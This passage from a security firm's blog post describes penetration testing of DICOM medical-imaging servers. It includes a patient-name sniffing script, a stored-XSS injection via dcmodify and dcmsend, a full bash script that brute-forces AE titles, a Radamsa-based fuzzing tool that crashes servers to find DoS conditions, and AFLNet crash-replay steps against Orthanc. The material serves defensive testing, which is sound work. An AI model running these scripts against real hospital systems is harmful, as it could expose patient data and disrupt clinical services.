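    (0010,0010) elements in Implicit VR Little Endian encoding:
    2-byte group, 2-byte element, 4-byte length, then the value."""
    tag = struct.pack("<HH", 0x0010, 0x0010)  # group, element (little endian)
    names, pos = [], 0
    while (pos := stream.find(tag, pos)) != -1:
        if pos + 8 > len(stream):
            break
        length = struct.unpack_from("<I", stream, pos + 4)[0]  # value length
        value = stream[pos + 8 : pos + 8 + length]
        # PN values are at most 64 characters; skip implausible matches
        if 0 < length <= 64 and len(value) == length and value.isascii():
            names.append(value.decode().strip())
        pos += 1
    return names

# A synthetic element as it might appear in a sniffed C-FIND response:
element = struct.pack("<HHI", 0x0010, 0x0010, 12) + b"Jones^James "
print(extract_patient_names(b"\x00" * 4 + element))  # ['Jones^James']
```

Anything encrypted with TLS would, of course, yield nothing to this kind of scan, which is exactly the point of the recommendation above.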

3. Exploiting Unprotected Services

Some DICOM services may be left exposed without authentication. This can allow remote attackers to:

1. Upload malicious DICOM files (which could contain embedded scripts or executables)

Using dcmodify, it is possible to include malicious payloads, such as the XSS payload below, in various attributes of the DCM file. The dcmsend tool can then be used to store the object on the server.

└─$ dcmodify -m "PatientName=<script>alert();</script>" 0002.DCM

└─$ dcmsend -v -aec DCM4CHEE 172.24.0.1 11112 0002.DCM
I: checking input files ...
I: starting association #1
I: initializing network ...
I: negotiating network association ...
I: Requesting Association
I: Association Accepted (Max Send PDV: 16340)
I: sending SOP instances ...
I: Sending C-STORE Request (MsgID 1, XA)
I: Received C-STORE Response (Success)
I: Releasing Association
I:
I: Status Summary
I: --------------
I: Number of associations   : 1
I: Number of pres. contexts : 1
I: Number of SOP instances  : 1
I: - sent to the peer       : 1
I:   * with status SUCCESS  : 1

The payload will then be consumed by the server and potentially be shown to an authenticated user. Depending on the input validation and output encoding in place, it can introduce vulnerabilities to other systems. In the DCM4CHEE case, the XSS payload was properly encoded before being returned to the user’s browser, preventing execution of the script.
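
The defense that worked here is contextual output encoding. As a minimal illustration (not DCM4CHEE's actual code), encoding HTML metacharacters before rendering turns the payload into inert text:

```python
import html

payload = "<script>alert();</script>"

# html.escape replaces &, <, > (and quotes) with HTML entities,
# so a browser renders the payload as text instead of executing it.
encoded = html.escape(payload)
print(encoded)  # &lt;script&gt;alert();&lt;/script&gt;
```

Servers that store attacker-controlled DICOM attributes but skip this step when displaying them are the ones where a stored XSS lands.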

2. Query or retrieve existing images without authorization.
In the following example, the DVTk RIS Simulator was used in its default configuration. It was observed that, despite the local and remote AETs being set, data could still be retrieved without providing any AET.

Taking a closer look at the logs, it appears that a couple of errors were generated during the connection; however, they did not prevent data from being returned. This could be due to the default configuration of this emulator, but there was no obvious way to change this behavior through the settings. It serves as an example of a misconfigured server that does not properly validate the AET.

Testing Approach:

  • Use dcmsend to attempt to store a manipulated DICOM file to the server.
  • Use findscu and getscu to retrieve images.
  • Check logs and responses to confirm unauthorized or unauthenticated operations are possible.

4. Brute-Forcing AETs

DICOM servers rely on matching AETs to accept requests. These AETs may not be well-guarded or could be guessable. A brute-force attack aims to discover valid AETs that the server recognizes.
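
The reason AETs can be tested this cheaply is that the called AE Title travels in cleartext in the fixed portion of the A-ASSOCIATE-RQ PDU (DICOM PS3.8). The sketch below is our own illustration of that layout; a complete request also carries application-context, presentation-context, and user-information items, which findscu supplies for us:

```python
import struct

def associate_rq_fixed(called_aet: str, calling_aet: str, var_items: bytes = b"") -> bytes:
    """Build the fixed 74-byte portion of an A-ASSOCIATE-RQ PDU (PS3.8).

    var_items stands in for the application-context, presentation-context
    and user-information items of a complete request."""
    body = (
        struct.pack(">HH", 1, 0)                 # protocol version 1, reserved
        + called_aet.ljust(16).encode("ascii")   # called AET: the value being brute-forced
        + calling_aet.ljust(16).encode("ascii")  # calling AET: the client's identity
        + b"\x00" * 32                           # reserved
        + var_items
    )
    # PDU header: type 0x01 (A-ASSOCIATE-RQ), reserved byte, 4-byte big-endian length
    return struct.pack(">BBI", 0x01, 0, len(body)) + body
```

A server that recognizes the called AET answers with A-ASSOCIATE-AC (PDU type 0x02); "called AE title not recognized" comes back as A-ASSOCIATE-RJ (0x03), which is the condition the findscu-based script below surfaces as a distinct exit code.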

Using findscu for AET Verification

You can systematically try a list of potential AETs using findscu. The bash script below automates the process.

#!/usr/bin/env bash
#
# Usage: ./dicom_aet_bruteforce.sh <host> <port> <aet_file>
#
# Description:
#   Attempts to find a valid Called AE Title on a DICOM server by iterating
#   over a list of candidate AETs and using the 'findscu' command from DCMTK.
#
#   Exit codes from findscu are interpreted as:
#       0 = Success (found a valid AE Title, stop the script)
#       2 = Unrecognized AE Title (continue to next candidate)
#       otherwise = Other error (continue to next candidate)
#
# Requirements:
#   - DCMTK installed (to have the 'findscu' utility).
#   - Bash v4+.
#

# --- 1) Check script arguments -----------------------------------------------
if [ $# -ne 3 ]; then
  echo "Usage: $0 <host> <port> <aet_file>"
  exit 1
fi

HOST="$1"
PORT="$2"
AET_FILE="$3"

# --- 2) Ensure findscu is installed ------------------------------------------
if ! command -v findscu >/dev/null 2>&1; then
  echo "[ERROR] 'findscu' not found. Please install DCMTK or verify your PATH."
  exit 1
fi

# --- 3) Validate the AET file -----------------------------------------------
if [ ! -f "$AET_FILE" ]; then
  echo "[ERROR] AET file '$AET_FILE' not found or is not a regular file."
  exit 1
fi

# --- 4) Brute-force loop over AET candidates ---------------------------------
while IFS= read -r AET; do

  # Skip empty lines
  [ -z "$AET" ] && continue

  echo "[INFO] Trying AET: '$AET'"

  # Run findscu with the desired parameters
  # -aet IOA  (Our local AE Title)
  # -aec "$AET" (Called AE Title)
  # -k 0008,0052="PATIENT"  (Query/Retrieve level = PATIENT)
  # -k 0010,0010 (Return Patient Name)
  # -k 0010,0020 (Return Patient ID)
  # -S (use the study root query model)
  findscu -v \
    -aet IOA \
    -aec "$AET" \
    "$HOST" "$PORT" \
    -k 0008,0052="PATIENT" \
    -k 0010,0010 \
    -k 0010,0020 \
    -S >/dev/null 2>&1

  EXIT_CODE=$?

  # --- 5) Check the exit code ------------------------------------------------
  case $EXIT_CODE in
    0)
      # 0 means success
      echo "[SUCCESS] Found a valid Called AE Title: '$AET'"
      exit 0
      ;;
    2)
      # 2 typically means "Called AE Title Not Recognized"
      echo "[FAILED] AE Title not recognized: '$AET'"
      # Continue trying next AE Title
      ;;
    *)
      # Other exit codes - treat as unexpected error but keep going
      echo "[ERROR] findscu returned exit code: $EXIT_CODE"
      echo "[INFO] Continuing with next AET..."
      ;;
  esac

done < "$AET_FILE"

# If we reach here, no AE Title responded successfully
echo "[INFO] Brute-forcing completed. No valid AE Title found."
exit 1

Sample output:

└─$ ./dicom-brute-aet.sh 172.24.0.1 11112 aets.txt
[INFO] Trying AET: 'WRONGAET'
[FAILED] AE Title not recognized: 'WRONGAET'
[INFO] Trying AET: 'BADAET'
[FAILED] AE Title not recognized: 'BADAET'
[INFO] Trying AET: 'DCM4CHEE'
[SUCCESS] Found a valid Called AE Title: 'DCM4CHEE'

5. Fuzzing the Protocol

What is Fuzzing?

Fuzzing is an automated testing methodology where invalid, unexpected, or random inputs (payloads) are injected into a program to observe its behavior. Payloads can be:

  • Mutation-Based: Derived from existing valid inputs by altering values, formats, or structures
  • Generation-Based: Created from scratch based on a model or protocol specification

Fuzzing is typically categorized into:

  • Black-Box Fuzzing:
    In this scenario, the source code of the target application is unavailable. The fuzzer interacts only with the executable, observing output or crashes to infer vulnerabilities.
  • Grey-Box Fuzzing:
    When source code is available, the binary can be instrumented. This allows the fuzzer to monitor execution paths, functions, and memory usage. The feedback enables the fuzzer to steer test case generation, focusing on areas that exhibit unusual behavior or crashes.

By leveraging fuzzing, testers can identify memory corruption, unhandled exceptions, and other vulnerabilities that might compromise system security.
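
To make the mutation-based idea concrete, here is a deliberately tiny sketch (illustrative only, nowhere near Radamsa's sophistication) that derives corrupted variants from a seed input:

```python
import random

def mutate(seed: bytes, rng: random.Random, max_mutations: int = 4) -> bytes:
    """Apply a few random byte-level mutations (bit flip, insert, delete)
    to a seed input -- the core idea behind mutation-based fuzzing."""
    data = bytearray(seed)
    for _ in range(rng.randint(1, max_mutations)):
        op = rng.choice(("flip", "insert", "delete"))
        if op == "flip" and data:
            data[rng.randrange(len(data))] ^= 1 << rng.randrange(8)
        elif op == "insert":
            data.insert(rng.randrange(len(data) + 1), rng.randrange(256))
        elif op == "delete" and len(data) > 1:
            del data[rng.randrange(len(data))]
    return bytes(data)

# Each call yields a slightly corrupted variant of the seed, which would
# then be fed to the target (e.g. via dcmodify and dcmsend).
rng = random.Random(7)
print(mutate(b"DOE^JOHN", rng))
```

Generation-based fuzzers instead build inputs from a model of the format, e.g. from the DICOM PDU and data-set grammar, trading setup effort for deeper protocol coverage.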

Fuzzing the DICOM protocol involves injecting malformed or unexpected data into the server to trigger crashes, hangs, or other unintended behaviors. Two tools we commonly use are Radamsa[5] and AFLNet[6].


Radamsa Fuzzing Example (Black-Box Fuzzing)

Radamsa is a simple yet powerful fuzzer that mutates existing test files and passes the mutations to the target. Below is a step-by-step manual approach to fuzz the PatientName attribute in a DICOM file:

1. Dump a sample DICOM file to a text file:

$ dcmdump /path/to/dicom/file.dcm > original_dump.txt

2. Identify the PatientName line:

$ dcmdump /path/to/dicom/file.dcm --search PatientName

3. Use radamsa to generate mutated strings for the PatientName:

$ echo "DOE^JOHN" | radamsa > mutated_name.txt

4. Use dcmodify to insert the mutated name into the original DICOM file:

$ dcmodify -m "PatientName=$(cat mutated_name.txt)" /path/to/dicom/file.dcm

5. Send the modified DICOM file to the server:

$ dcmsend -aet MYAET -aec SERVERAET 192.168.1.10 104 /path/to/dicom/file.dcm

Below is an example Python script to automate this process. The script processes a DICOM file, extracts specific attributes, and allows the user to select which attributes to fuzz. For each selected attribute, the script generates a payload using Radamsa, modifies the DICOM file with the payload, and sends the modified file to the specified DICOM server using dcmsend. After sending each payload, the echoscu command is used to check if the server is still responding, so a potential DoS can be detected.

To run the script, use the following command:

$ python dicom_fuzzing_tool.py --dcm <path_to_dicom_file> --payloads <number_of_payloads> --aet <server_AET> --ip <server_IP> --port <server_port> [-d]

Replace the placeholders with appropriate values:

  • <path_to_dicom_file>: Path to the DICOM file to be processed
  • <number_of_payloads>: Number of payloads to create for each target attribute
  • <server_AET>: The called AE Title of the server (the script passes it to dcmsend and echoscu via -aec)
  • <server_IP>: IP address of the DICOM server
  • <server_port>: Port number of the DICOM server
  • -d: Enables debug mode for verbose output (optional)

import argparse
import os
import subprocess
import tempfile
import shutil

def run_command(command, debug):
    if debug:
        print(f"[DEBUG] Running command: {command}")
    try:
        result = subprocess.run(command, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if debug:
            print(f"[DEBUG] Command output: {result.stdout}")
        return result.stdout
    except subprocess.CalledProcessError as e:
        print(f"[!] Command failed: {command}")
        print(f"[!] Error: {e.stderr}")
        exit(1)

def run_command_raw(command, debug):
    if debug:
        print(f"[DEBUG] Running command: {command}")
    try:
        result = subprocess.run(command, shell=True, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        if debug:
            print(f"[DEBUG] Raw Command output: {result.stdout[:50]}... (truncated for debug)")
        return result.stdout
    except subprocess.CalledProcessError as e:
        print(f"[!] Command failed: {command}")
        print(f"[!] Error: {e.stderr}")
        exit(1)

def parse_dcmdump(dump_output):
    valid_attributes = {
        "StudyDate",
        "StudyTime",
        "Manufacturer",
        "InstitutionName",
        "InstitutionAddress",
        "ReferringPhysicianName",
        "StudyDescription",
        "PerformingPhysicianName",
        "PatientName",
        "PatientID",
        "PatientBirthDate",
        "PatientSex",
        "StudyID",
        "SeriesNumber",
        "InstanceNumber",
        "PatientOrientation",
    }

    attributes = {}
    try:
        for line in dump_output.splitlines():
            if line.startswith("(") and "#" in line:  # Ensure the line has a tag and description
                parts = line.split("#", 1)  # Split at the `#`
                tag_and_value = parts[0].strip()  # Left part: tag and value
                description = parts[1].strip()  # Right part: attribute name and value

                # Extract the tag and the value
                if "(" in tag_and_value and ")" in tag_and_value:
                    tag, raw_value = tag_and_value.split(")", 1)
                    tag = tag.strip() + ")"
                    value = raw_value.strip()
                    if "[" in value and "]" in value:  # Extract value from square brackets
                        value = value[value.index("[") + 1 : value.index("]")]
                    else:
                        value = "(no value available)"

                    # Extract the attribute name
                    name = description.split()[-1]  # The last word in the description
                    if name in valid_attributes:
                        attributes[name] = (tag, value)
    except Exception as e:
        print(f"[!] Error while parsing dcmdump output: {e}")
        exit(1)

    return attributes

def generate_payload(original_value, debug):
    print("[*] Generating a payload with radamsa...")
    try:
        command = f"echo {original_value} | radamsa"
        result = run_command_raw(command, debug)
        return result.strip()
    except Exception as e:
        print(f"[!] Error generating payload: {e}")
        exit(1)

def check_server_responsiveness(server_ip, server_port, aet, debug):
    try:
        command = f"echoscu -v {server_ip} {server_port} -aec {aet} -to 1"
        if debug:
            print(f"[DEBUG] Checking server responsiveness with: {command}")
        result = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
        if debug:
            print(f"[DEBUG] echoscu output: {result.stdout}")
        
        # Check for success
        if result.returncode == 0:
            return True

        # Handle specific errors
        if "Peer aborted Association" in result.stderr or "Association Request Failed" in result.stderr:
            if debug:
                print(f"[DEBUG] Association error detected: {result.stderr}")
            return False  # Server is unresponsive, treat as a potential DoS

        # Treat other errors as unexpected
        print(f"[!] Unexpected error while checking server responsiveness: {result.stderr}")
        return False

    except Exception as e:
        print(f"[!] Error checking server responsiveness: {e}")
        exit(1)

def escape_payload(payload):
    if isinstance(payload, bytes):
        payload = payload.decode(errors="replace")
    # Escape backslashes first, so the backslashes introduced below are not doubled
    payload = payload.replace("\\", "\\\\")
    # Encode null bytes
    payload = payload.replace("\x00", "\\x00")
    # Escape problematic shell characters
    payload = payload.replace("`", "\\`").replace("\"", "\\\"").replace("$", "\\$").replace("'", "'\"'\"'").replace("(", "\\(").replace(")", "\\)")
    return payload

def modify_and_send(dcm_file, tag, original_value, num_payloads, aet, server_ip, server_port, debug):
    try:
        # Create a temporary copy of the original DICOM file
        temp_dcm_file = tempfile.NamedTemporaryFile(delete=False, suffix=".dcm").name
        shutil.copy(dcm_file, temp_dcm_file)

        payload_file_path = None
        for i in range(num_payloads):
            try:
                # Generate a single payload
                payload = generate_payload(original_value, debug)

                # Debugging output for payload
                if debug:
                    safe_payload = payload.decode(errors="replace") if isinstance(payload, bytes) else payload
                    print(f"[DEBUG] Payload for modification: {safe_payload}")

                # Escape the payload for the shell command
                escaped_payload = escape_payload(payload)

                # Save the payload to a file
                if not payload_file_path:
                    payload_file = tempfile.NamedTemporaryFile(delete=False, suffix=".txt", mode="w")
                    payload_file_path = payload_file.name
                    payload_file.write(escaped_payload + "\n")
                    payload_file.close()

                # Modify the DICOM file
                command = f"dcmodify -m \"{tag}={escaped_payload}\" {temp_dcm_file}"
                if debug:
                    print(f"[DEBUG] dcmodify command: {command}")
                run_command(command, debug)

                # Send the modified file
                send_command = f"dcmsend -v -aec {aet} {server_ip} {server_port} {temp_dcm_file} -to 1"
                result = subprocess.run(send_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)

                if result.returncode != 0:
                    if i == 0:
                        print(f"[!] Connection could not be established during the first payload. Please check the server configuration or network.")
                        exit(1)
                    else:
                        print(f"[!] Potential DoS detected: dcmsend failed for payload {i}.")
                        print(f"[!] The payload causing the issue has been retained at: {payload_file_path}")
                        exit(1)

                print(f"[*] Sent modified file")

                # Check server responsiveness
                if not check_server_responsiveness(server_ip, server_port, aet, debug):
                    print(f"[!] Potential DoS detected. The server is no longer responsive after payload {i}.")
                    print(f"[!] The payload causing the issue has been retained at: {payload_file_path}")
                    exit(1)


            except Exception as e:
                print(f"[!] Error during modification or sending for payload {i}: {e}")
    except Exception as e:
        print(f"[!] Error in modify_and_send: {e}")
    finally:
        # Cleanup temporary file
        try:
            os.remove(temp_dcm_file)
        except Exception as e:
            print(f"[!] Error cleaning up temporary file: {e}")

def main():
    parser = argparse.ArgumentParser(description="DICOM Fuzzing Tool")
    parser.add_argument("--dcm", required=True, help="Path to the DICOM DCM file.")
    parser.add_argument("--payloads", type=int, required=True, help="Number of payloads to generate.")
    parser.add_argument("--aet", required=True, help="Called AE Title of the server (used as -aec).")
    parser.add_argument("--ip", required=True, help="Server IP for dcmsend.")
    parser.add_argument("--port", required=True, help="Server port for dcmsend.")
    parser.add_argument("-d", action="store_true", help="Enable debugging information.")

    args = parser.parse_args()

    debug = args.d

    try:
        # Step 1: Dump the DICOM file
        print("[*] Dumping DICOM file...")
        dump_output = run_command(f"dcmdump --search StudyDate --search StudyTime --search Manufacturer --search InstitutionName --search InstitutionAddress --search ReferringPhysicianName --search StudyDescription --search PerformingPhysicianName --search PatientName --search PatientID --search PatientBirthDate --search PatientSex --search StudyID --search SeriesNumber --search InstanceNumber --search PatientOrientation {args.dcm}", debug)

        # Step 2: Parse attributes
        attributes = parse_dcmdump(dump_output)
        if not attributes:
            print("[!] No attributes found in the DICOM file.")
            exit(1)

        print("[*] Attributes found:")
        for i, (name, (tag, value)) in enumerate(attributes.items(), 1):
            print(f"{i}. {name} (Tag: {tag}) Value: {value}")

        # Step 3: User selects attributes to fuzz
        selected_indices = input("Enter the numbers of the attributes to fuzz (comma-separated): ")
        selected_indices = [int(i.strip()) for i in selected_indices.split(",")]

        selected_attributes = [(list(attributes.items())[i - 1]) for i in selected_indices]

        for name, (tag, value) in selected_attributes:
            print(f"[*] Fuzzing attribute: {name} (Tag: {tag}) Value: {value}")

            # Step 4: Modify and send the DICOM file with generated payloads
            modify_and_send(args.dcm, tag, value, args.payloads, args.aet, args.ip, args.port, debug)

        print("[*] Fuzzing process completed.")
    except Exception as e:
        print(f"[!] An unexpected error occurred: {e}")

if __name__ == "__main__":
    main()

Sample output:

└─$ python3 dicom_fuzzing_tool.py --dcm 0002.DCM --payloads 30 --aet DCM4CHEE --ip 172.24.0.1 --port 11112
[*] Dumping DICOM file...
[*] Attributes found:
1. StudyDate (Tag: (0008,0020)) Value: 19941013
2. StudyTime (Tag: (0008,0030)) Value: 141917
3. Manufacturer (Tag: (0008,0070)) Value: (no value available)
4. InstitutionName (Tag: (0008,0080)) Value: (no value available)
5. InstitutionAddress (Tag: (0008,0081)) Value: (no value available)
6. ReferringPhysicianName (Tag: (0008,0090)) Value: (no value available)
7. StudyDescription (Tag: (0008,1030)) Value: (no value available)
8. PerformingPhysicianName (Tag: (0008,1050)) Value: (no value available)
9. PatientName (Tag: (0010,0010)) Value: Jameson
10. PatientID (Tag: (0010,0020)) Value: 10-56-00
11. PatientBirthDate (Tag: (0010,0030)) Value: 19951025
12. PatientSex (Tag: (0010,0040)) Value: M
13. StudyID (Tag: (0020,0010)) Value: 1
14. SeriesNumber (Tag: (0020,0011)) Value: 1
15. InstanceNumber (Tag: (0020,0013)) Value: (no value available)
16. PatientOrientation (Tag: (0020,0020)) Value: (no value available)
Enter the numbers of the attributes to fuzz (comma-separated): 9,10
[*] Fuzzing attribute: PatientName (Tag: (0010,0010)) Value: Jameson
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[*] Sent modified file
[*] Generating a payload with radamsa...
[!] Potential DoS detected: dcmsend failed for payload 10.
[!] The payload causing the issue has been retained at: /tmp/tmpdyzfby98.txt

AFLNET Fuzzing Example (Grey-Box Fuzzing)

The Fuzzers
American Fuzzy Lop[7] (AFL) is a widely used fuzzing tool that performs intelligent input mutation to discover vulnerabilities in programs. It utilizes instrumentation to monitor execution paths and prioritize test cases that reach new code paths, making it highly effective for uncovering security flaws. For instrumentation, the source code of the target application is required. AFL supports applications written in C and C++.

AFLNet[8] is an extension of AFL specifically designed for fuzzing network-based applications. It was created by V.T. Pham, M. Böhme, and A. Roychoudhury in 2020, and was first demonstrated in their work “AFLNet: A Greybox Fuzzer for Network Protocols.”[9]

Unlike AFL, which focuses on file-based fuzzing, AFLNet allows interaction with network protocols, making it suitable for fuzzing DICOM servers, such as ORTHANC, that we will use in our examples later on. AFLNet monitors network interactions and adapts test case generation based on protocol states, improving its effectiveness in testing complex network-based systems.

The Target
Orthanc[10] is a particularly good candidate for AFLNet fuzzing because it is an open-source, lightweight DICOM server that supports various network-based interactions, making it an ideal target for testing protocol implementations and identifying vulnerabilities in how it processes DICOM messages over TCP/IP. Orthanc is also widely deployed and used by many well-known healthcare companies.

Since Orthanc’s source code is publicly available, it can be instrumented to provide execution feedback, allowing AFLNet to optimize fuzzing efficiency and discover deeper issues within the application’s logic.

The Fuzzing
Below, we outline the steps we used to configure our environment and instrument the target binary. For the test environment, we used an Ubuntu Server (24.04.1) virtual machine running on VMware Workstation 17.

1. Install dependencies and required tools for the fuzzing:

# Install dependencies
$ apt-get update
$ apt-get install build-essential unzip cmake mercurial patch \
                uuid-dev libcurl4-openssl-dev liblua5.3-dev \
                libgtest-dev libpng-dev libsqlite3-dev libssl-dev libjpeg-dev \
                zlib1g-dev libdcmtk-dev libboost-all-dev libwrap0-dev \
                libcharls-dev libjsoncpp-dev libpugixml-dev tzdata protobuf-compiler \
                screen net-tools clang graphviz-dev libcap-dev tcpdump dcmtk
#Clone the AFLNet repository
$ git clone https://github.com/aflnet/aflnet.git aflnet
#Compile it
$ cd aflnet
$ make

2. Instrument Orthanc

#Download the source code
$ wget https://orthanc.uclouvain.be/downloads/sources/orthanc/Orthanc-1.12.6.tar.gz
#Extract
$ tar -xvf Orthanc-1.12.6.tar.gz
$ cd Orthanc-1.12.6
$ mkdir Build
$ cd Build/
#Use the C and C++ compilers included in AFLNet to instrument Orthanc
$ cmake -DCMAKE_C_COMPILER=/home/ubuntu/aflnet/afl-gcc \
    -DCMAKE_CXX_COMPILER=/home/ubuntu/aflnet/afl-g++ \
    -DALLOW_DOWNLOADS=ON \
    -DUSE_GOOGLE_TEST_DEBIAN_PACKAGE=ON \
    -DUSE_SYSTEM_CIVETWEB=OFF \
    -DDCMTK_LIBRARIES=dcmjpls \
    -DCMAKE_BUILD_TYPE=Release \
    ../OrthancServer/
$ make clean all

Instrumentation will take some time and, with a bit of luck, should complete without errors.

The following changes will weaken the checks performed by the server so it accepts queries from SCU modalities it does not know about.

  "DicomAlwaysAllowFind" : true,
  "DicomAlwaysAllowFindWorklist" : true,
  "DicomAlwaysAllowGet" : true,
  "DicomAlwaysAllowMove" : true,
  "DicomEchoChecksFind" : true,

The following change will allow our payloads to overwrite the previous one so that we don’t need to generate unique study identifiers.

"OverwriteInstances" : true

We can then run Orthanc, providing the configuration file location as a positional parameter.

$ ./Orthanc ../OrthancServer/Resources/Configuration.json

3. Prepare input seed files:
For this step we need to perform DICOM operations using the DCMTK toolkit (as we have seen in another section) and capture the network traffic using tcpdump[11].

#While the Orthanc server is running, we capture incoming traffic on port 4242
$ sudo tcpdump -w orthanc.pcap -i eth0 port 4242
#From another machine we use dcmsend to store a DICOM file on the server
$ dcmsend -v -aec ORTHANC 192.168.125.128 4242 dicom/0004.DCM

We then use Wireshark to read the pcap file and isolate the outgoing traffic from the dcmsend client towards the DICOM server.

We can achieve this by selecting Follow > TCP Stream on the DICOM conversation, then clicking the “Entire conversation” drop-down list and selecting the outgoing traffic, which should start with the IP address of the machine running the dcmsend client.

Next, we select “Show as” RAW format and click on the “Save as” button to save the file.

Note: Repeat the steps above during other DICOM operations, such as C-FIND and C-GET, to obtain more seed files.

Store the files in a new directory for later use. Ensure that the directory contains only seed files.
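AFLNet treats every entry in the input directory as a seed, so stray files or empty captures waste fuzzing cycles. Below is a minimal Python sketch of such a sanity check; the /tmp/seed-demo directory and file names are stand-ins for a real seed directory such as /home/ubuntu/aflnet/input/:

```python
from pathlib import Path

def check_seed_dir(seed_dir):
    """Return a sorted list of problem entries: anything that is not a
    non-empty regular file (AFLNet will try to use every entry as a seed)."""
    problems = []
    for entry in Path(seed_dir).iterdir():
        if not entry.is_file() or entry.stat().st_size == 0:
            problems.append(entry.name)
    return sorted(problems)

# Demonstration with a throwaway directory standing in for the real one.
demo = Path("/tmp/seed-demo")
demo.mkdir(exist_ok=True)
(demo / "c-store.raw").write_bytes(b"\x01\x00\x00\x04")  # fake seed bytes
(demo / "empty.raw").write_bytes(b"")                    # would waste cycles
print(check_seed_dir(demo))
# → ['empty.raw']
```

An empty result means the directory is ready to hand to afl-fuzz via -i.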

4. Start the fuzzing process:

AFLNet takes the following parameters:

ubuntu@ubuntu-server:~/aflnet$ ./afl-fuzz
afl-fuzz 2.56b by <lcamtuf@google.com>

./afl-fuzz [ options ] -- /path/to/fuzzed_app [ ... ]

Required parameters:

  -i dir        - input directory with test cases
  -o dir        - output directory for fuzzer findings

Execution control settings:

  -f file       - location read by the fuzzed program (stdin)
  -t msec       - timeout for each run (auto-scaled, 50-1000 ms)
  -m megs       - memory limit for child process (50 MB)
  -Q            - use binary-only instrumentation (QEMU mode)

Fuzzing behavior settings:

  -d            - quick & dirty mode (skips deterministic steps)
  -n            - fuzz without instrumentation (dumb mode)
  -x dir        - optional fuzzer dictionary (see README)

Settings for network protocol fuzzing (AFLNet):

  -N netinfo    - server information (e.g., tcp://127.0.0.1/8554)
  -P protocol   - application protocol to be tested (e.g., RTSP, FTP, DTLS12, DNS, SMTP, SSH, TLS)
  -D usec       - waiting time (in micro seconds) for the server to initialize
  -W msec       - waiting time (in miliseconds) for receiving the first response to each input sent
  -w usec       - waiting time (in micro seconds) for receiving follow-up responses
  -e netnsname  - run server in a different network namespace
  -K            - send SIGTERM to gracefully terminate the server (see README.md)
  -E            - enable state aware mode (see README.md)
  -R            - enable region-level mutation operators (see README.md)
  -F            - enable false negative reduction mode (see README.md)
  -c cleanup    - name or full path to the server cleanup script (see README.md)
  -q algo       - state selection algorithm (See aflnet.h for all available options)
  -s algo       - seed selection algorithm (See aflnet.h for all available options)

Other stuff:

  -T text       - text banner to show on the screen
  -M / -S id    - distributed mode (see parallel_fuzzing.txt)
  -C            - crash exploration mode (the peruvian rabbit thing)

Before starting the fuzzer, ensure that the Orthanc server has been stopped.

We start the fuzzer with the following command:

#The -M parameter allows us to run multiple fuzzing sessions to utilize more CPU cores and speed up the process
# Fiddling with the -m 700 was required to identify the ideal memory limit for the child process
# Make sure that the value provided to -N is the IP address and port number used during the DCMTK client interaction. 
# Fiddling with the -D and -t parameters is required depending on how fast the server is spun up and how long it needs to initialise  
$ sudo /home/ubuntu/aflnet/afl-fuzz -M fuzzer1 -m 700 -i /home/ubuntu/aflnet/input/ -o /home/ubuntu/aflnet/output/ -N tcp://192.168.125.128/4242 -P DICOM -D 1000 -t 3000+ -q 3 -s 3 -K -E -R /home/ubuntu/Orthanc-1.12.6/Build/Orthanc /home/ubuntu/Orthanc-1.12.6/OrthancServer/Resources/Configuration.json

If we did everything correctly so far, the AFL status screen will appear, and some unique crashes should be identified after a while.

If we run multiple concurrent fuzzing sessions using the -M and -S parameters, we can use the afl-whatsup tool to monitor the total progress.

Additionally, any existing output directory can be used to resume aborted jobs using the -i- parameter:

$ ./afl-fuzz -i- -o existing_output_dir [...etc...]

5. Monitor crashes and hangs.
Crashes and hangs identified during fuzzing are located in output_dir/crashes and output_dir/hangs respectively.
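As a quick inventory step, the crash inputs can be listed programmatically. The sketch below assumes AFLNet's default output layout (the fuzzer1 instance name matches the -M parameter used earlier); the demonstration tree and file names are fabricated:

```python
from pathlib import Path

def crash_inputs(output_dir):
    """List replayable crash files for one fuzzer instance, skipping the
    README that AFL drops into the crashes directory."""
    crash_dir = Path(output_dir) / "fuzzer1" / "replayable-crashes"
    return sorted(p.name for p in crash_dir.iterdir()
                  if not p.name.startswith("README"))

# Fabricated output tree mirroring AFLNet's on-disk layout.
root = Path("/tmp/aflnet-demo/output/fuzzer1/replayable-crashes")
root.mkdir(parents=True, exist_ok=True)
for name in ("id:000000,sig:11", "id:000001,sig:06", "README.txt"):
    (root / name).touch()
print(crash_inputs("/tmp/aflnet-demo/output"))
# → ['id:000000,sig:11', 'id:000001,sig:06']
```

The same listing is what the replay loop shown below iterates over.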

In order to replicate a crash, the aflnet-replay tool can be used. Before replaying a crash, make sure that any fuzzing session has been stopped and the Orthanc server is up and running.

To replay a crash, use the following command:

$ sudo ~/aflnet/aflnet-replay ~/aflnet/output/fuzzer1/replayable-crashes/<crash file name> DICOM 4242

The following one-liner Bash script will go through all files in a directory and use aflnet-replay to send them to the server.

$ for i in $(sudo ls output/fuzzer1/replayable-crashes | grep -v README); do echo "Replaying: $i" && sudo ~/aflnet/aflnet-replay ~/aflnet/output/fuzzer1/replayable-crashes/"$i" DICOM 4242 || { echo "Error processing $i"; break; }; done

Reviewing the server logs after the crash replays shows that a number of errors were generated but the server is still running.

Next Steps

The next step is to analyze the crashes to identify their root cause. A deeper analysis can be achieved by using the GNU Debugger (gdb) on the core dump files. This analysis can help us identify vulnerabilities, such as buffer overflows, and determine whether they are exploitable. This will be the content of a future post, so stay tuned!

Conclusion

DICOM is a crucial protocol in modern healthcare but can also pose a significant attack surface if left unsecured or misconfigured. Through techniques like identifying insecure configurations, testing for unencrypted communications, exploiting unprotected services, and fuzzing the protocol, security teams can proactively identify and remediate vulnerabilities in their medical imaging infrastructure.

At IOActive, our penetration testing services span this entire spectrum—from initial reconnaissance and misconfiguration checks to deep protocol fuzzing and advanced exploitation. If you’re interested in fortifying your PACS or would like to learn more about how we can help, get in touch with us today.

Stay secure, and until next time, happy testing!


[1] https://www.dicomstandard.org/current

